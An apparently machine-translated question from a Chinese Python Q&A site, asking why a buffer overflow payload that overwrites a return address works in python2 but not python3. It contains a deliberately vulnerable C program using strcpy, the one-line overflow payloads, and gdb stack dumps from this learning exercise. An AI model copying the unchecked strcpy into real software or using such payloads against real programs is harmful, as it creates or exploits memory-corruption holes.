Python中文网 - 问答频道, 解决您学习工作中的Python难题和Bug
Python常见问题
我正试图利用gdb和peda的一个简单的缓冲区溢出,我只想用程序的一个函数的地址重写返回地址,我可以很容易地用python2完成,但用python3似乎是不可能的,返回地址不是用好的地址重写的。你知道吗
根据我已经做的研究,编码是这个问题的原因,因为python2使用ascii,python3使用utf-8。 我在这个网站上发现了一些对我没有帮助的东西:/
以下是易受攻击应用程序的代码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
void checkPassword();
void goodPassword();
int main(int argc, char **argv)
{
printf("Debut du programme...\n");
if (argc < 2)
{
printf("Necessite un argument\n");
return 0;
}
printf("Appel de la fonction checkPassword\n");
checkPassword(argv[1]);
printf("Fin du programme\n");
}
void checkPassword(const char *arg)
{
char password[64];
strcpy(password, arg);
if (strcmp(password, "fromage") == 0)
{
goodPassword();
}
else
{
printf("Mauvais mot de passe\n");
}
}
void goodPassword() // This is the function I want to run, adress : 0x565562b2
{
printf("Mot de passe correcte!\n");
}
这是我在python2中使用的漏洞
starti $(python2 -c 'print "A"*76 + "\xb2\x62\x55\x56".strip() ')
以下是我在python3中使用的漏洞和strcpy的堆栈:
starti $(python3 -c 'print(b"A"*76 + b"\xb2\x62\x55\x56".strip() ')
gdb-peda$ x/24xw $esp
0xffffcc40: 0xffffcc50 0xffffcfa6 0xf7e2bca9 0x56556261
0xffffcc50: 0x41412762 0x41414141 0x41414141 0x41414141
0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc90: 0x41414141 0x41414141 0x41414141 0x785c4141
我期望这个输出:
gdb-peda$ x/24xw $esp
0xffffcc50: 0xffffcc60 0xffffcfac 0xf7e2bca9 0x56556261
0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcca0: 0x41414141 0x41414141 0x41414141 0x565562b2
运行goodPassword函数。 谢谢你的帮助
Tags: 函数stringinclude地址depasswordpython3python2
热门问题
- 在python3中使用Scipy pearsonr函数
- 在Python3中使用scipy对多个lorentzian进行数据拟合
- 在Python3中使用Script=argv
- 在python3中使用selenium webdriver进行未解析的回溯
- 在python3中使用selenium和phantomjs的网页截图之前如何等待?
- 在Python3中使用Selenium和Requests模块从网页获取文件
- 在python3中使用SIGINT终止函数
- 在Python3中使用SIGTERM时,允许进程完成而不是中断
- 在python3中使用smtplib发送XML内容
- 在python3中使用socket库(RFCOMM模式)重新连接蓝牙设备?
- 在python3中使用sounddevice和numpy编写wav文件
- 在python3中使用Sqlalchemy插入MySQL查找类型错误的原因
- 在python3中使用sqlite、pandas和sqlalchemy很难让rollback工作
- 在python3中使用SQLite的FTS3/4
- 在Python3中使用struct.calcsize()和len()有区别吗?
- 在python3中使用substring函数时发生TypeError
- 在Python3中使用Tkinter entry小部件写入串行设备
- 在python3中使用tkinter时,如何在每次按下函数时获得运行该函数的按钮?
- 在python3中使用tkinter的子帧
- 在Python3中使用tryexcept块时,如何避免使用未初始化的变量?
热门文章
- Python覆盖写入文件
- 怎样创建一个 Python 列表?
- Python3 List append()方法使用
- 派森语言
- Python List pop()方法
- Python Django Web典型模块开发实战
- Python input() 函数
- Python3 列表(list) clear()方法
- Python游戏编程入门
- 如何创建一个空的set?
- python如何定义(创建)一个字符串
- Python标准库 [The Python Standard Library by Ex
- Python网络数据爬取及分析从入门到精通(分析篇)
- Python3 for 循环语句
- Python List insert() 方法
- Python 字典(Dictionary) update()方法
- Python编程无师自通 专业程序员的养成
- Python3 List count()方法
- Python 网络爬虫实战 [Web Crawler With Python]
- Python Cookbook(第2版)中文版
目前没有回答
相关问题 更多 >
编程相关推荐